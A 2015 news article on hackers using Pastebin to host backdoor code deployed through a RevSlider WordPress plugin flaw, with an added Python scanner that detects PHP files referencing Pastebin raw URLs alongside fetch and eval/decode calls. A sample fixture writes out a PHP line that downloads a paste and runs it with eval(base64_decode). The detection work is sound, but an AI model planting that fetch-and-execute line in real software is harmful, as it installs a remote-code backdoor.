Hackers Exploiting Pastebin Website in Latest Attacks, Finds Sucuri
According to Sucuri, Pastebin, the website for copying and pasting content and probably best known as a channel through which attackers share stolen data, database dumps and malware, is now also being exploited by hackers to wage the attacks themselves, digital-era.net reported on January 6, 2015.
Rather than using hijacked websites to host malware, the hackers have started using Pastebin to distribute a harmful backdoor program and to instruct it to run malicious software.
Often a remote server is used to host the backdoor program. Recently, however, attacks have been observed abusing a vulnerability in RevSlider (Slider Revolution), a WordPress plug-in, in which the hackers use the Pastebin site to store their malicious programs.
Denis Sinegubko, Senior Malware Researcher at Sucuri, states that technically the hackers are using Pastebin.com for its original function, i.e. sharing code. In the present case, however, the code being shared among the crooks is malicious, and it is being used for unlawful operations, i.e. hacking, straight from Pastebin.com. The website lets users download the malicious program in raw form, explains Sinegubko. Softpedia.com reported this on January 8, 2015.
Moreover, the functions within the malicious program are not available in clear text; the intruders usually employ an encryption tool suited to Pastebin. Once the decryption operation has run, the program is ready for use.
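The following Python scanner, added here and not taken from Sucuri or the article, flags PHP files in a site tree that reference a Pastebin raw-paste URL, and rates them higher when the same file also calls functions that fetch remote content or decode and execute it. The function lists, file names and paste ID are constructed assumptions.

```python
import re
from pathlib import Path

# Raw-paste URL forms: raw.php?i=<id> (in use in 2015) and the later /raw/<id>.
PASTEBIN_RAW = re.compile(r"pastebin\.com/(?:raw\.php\?i=|raw/)[A-Za-z0-9]{8}", re.I)
# PHP calls that can pull remote content, and calls that decode or run it.
# Both lists are illustrative assumptions; the article names no functions.
FETCH = re.compile(r"\b(file_get_contents|curl_exec|fopen|wp_remote_get)\s*\(", re.I)
RUN = re.compile(r"\b(eval|assert|create_function|base64_decode|gzinflate)\s*\(", re.I)

def scan_source(text):
    """Return a finding for one PHP file's text, or None without a Pastebin URL."""
    urls = sorted({m.group(0) for m in PASTEBIN_RAW.finditer(text)})
    if not urls:
        return None
    fetch = sorted({f.lower() for f in FETCH.findall(text)})
    run = sorted({f.lower() for f in RUN.findall(text)})
    # A raw-paste URL beside both a fetch and a decode/run call is the strongest signal.
    severity = "high" if fetch and run else "medium" if fetch or run else "low"
    return {"severity": severity, "urls": urls, "fetch": fetch, "run": run}

def scan_tree(root):
    """Scan every .php/.phtml/.inc file under root; map relative path -> finding."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in {".php", ".phtml", ".inc"}:
            hit = scan_source(path.read_text(encoding="utf-8", errors="replace"))
            if hit:
                findings[path.relative_to(root).as_posix()] = hit
    return findings

# Constructed sample files (not real malware; the paste ID is a placeholder).
SAMPLES = {
    "wp-content/uploads/cache.php":
        "<?php $c = file_get_contents('http://pastebin.com/raw.php?i=XXXXXXXX');"
        " eval(base64_decode($c));",
    "wp-content/themes/demo/readme.php":
        "<?php // snippet source: https://pastebin.com/raw/XXXXXXXX\n echo 'hi';",
    "index.php": "<?php echo 'ok';",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan_source(body))
```

A "low" finding still deserves a look, since a legitimate WordPress file rarely needs a Pastebin URL at all; string matching like this will miss URLs that are split or encoded in the file.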
In early September 2014, Sucuri's researchers became aware of the technical problem in RevSlider. They estimated that cyber-crooks had tried to exploit the security flaw on 1,000 or more websites.
In mid-December 2014, Sucuri found SoakSoak, a malicious program that would overwrite files on WordPress websites that used an earlier version of RevSlider. Although Google had to ban 10,000 websites because they disseminated the program, the campaign did not come to a halt.
Sucuri points out that these new attacks show the need for security researchers to exercise greater caution when sharing malicious programs publicly, since hackers can reuse them straight away, for example directly from the Pastebin site. Before sharing, the programs can be visibly modified so that they do not run when downloaded in their raw form.
» SPAMfighter News - 1/16/2015